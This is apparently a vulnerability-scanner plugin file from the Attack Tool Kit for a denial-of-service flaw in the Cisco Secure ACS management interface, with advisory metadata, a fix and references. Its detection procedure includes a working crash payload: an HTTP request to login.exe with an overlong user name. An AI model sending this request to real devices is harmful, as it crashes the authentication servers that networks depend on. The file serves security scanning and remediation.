Cisco Secure ACS Management Interface Login Overflow 1.4
 
Plugin ID: 26
Plugin name: Cisco Secure ACS Management Interface Login Overflow
Plugin filename: Cisco Secure ACS Management Login Overflow.plugin
Plugin filesize: 3624 bytes
Plugin family: Network devices
Plugin created name: Marc Ruef
Plugin created email: marc dot ruef at computec dot ch
Plugin created web: http://www.computec.ch
Plugin created company: computec.ch
Plugin created date: 2003/11/14
Plugin updated name: Marc Ruef
Plugin updated email: marc dot ruef at computec dot ch
Plugin updated web: http://www.computec.ch
Plugin updated company: computec.ch
Plugin updated date: 2004/11/13
Plugin version: 1.4
Plugin changelog: Corrected the plugin structure and added the accuracy values in 1.4
Plugin protocol: tcp
Plugin port: 2002
Plugin procedure detectionopen|sleep|send GET /login.exe?user=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&reply=any&id=1 HTTP/1.0\n\n|sleep|close|open|sleep 5|close|pattern_exists Cisco
Plugin detection accuracy: 90
Plugin comment: This plugin was written with the ATK Attack Editor.
Bug advisory: http://www.securityfocus.com/archive/1/319576
Bug produced name: Cisco Systems
Bug produced email: info at cisco dot com
Bug produced web: http://www.cisco.com
Bug affected: Cisco Secure ACS 2.1 to 3.11
Bug not affected: Cisco Secure ACS newer than 3.11
Bug vulnerability class: Denial Of Service
Bug description: The Cisco Secure ACS Management Interface authenticates a user through a script named login.exe, to which the client sends the user name. If this parameter is more than 400 bytes long, the server crashes and has to be restarted before it works again.
Bug solution: Upgrade your Cisco firmware and filter incoming traffic on port tcp/80. As a workaround (disabling the web service), you could apply set web disabled, write, reboot on your device.
Bug fixing time: 20 minutes
Bug exploit availability: Yes
Bug exploit url: http://www.securityfocus.com/bid/7413/exploit/
Bug remote: Yes
Bug local: No
Bug severity: High
Bug popularity: 8
Bug simplicity: 8
Bug impact: 8
Bug risk: 8
Bug Nessus risk: High
Bug check tools: Nessus is able to do the same check.
Source CVE: CAN-2003-0210
Source SecurityFocus BID: 7413
Source Nessus ID: 11556
Source Literature: Hacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427
Source Misc.: http://www.securityfocus.com/archive/1/319483

This file was generated by the Attack Tool Kit (ATK), the open-sourced security scanner and exploiting framework.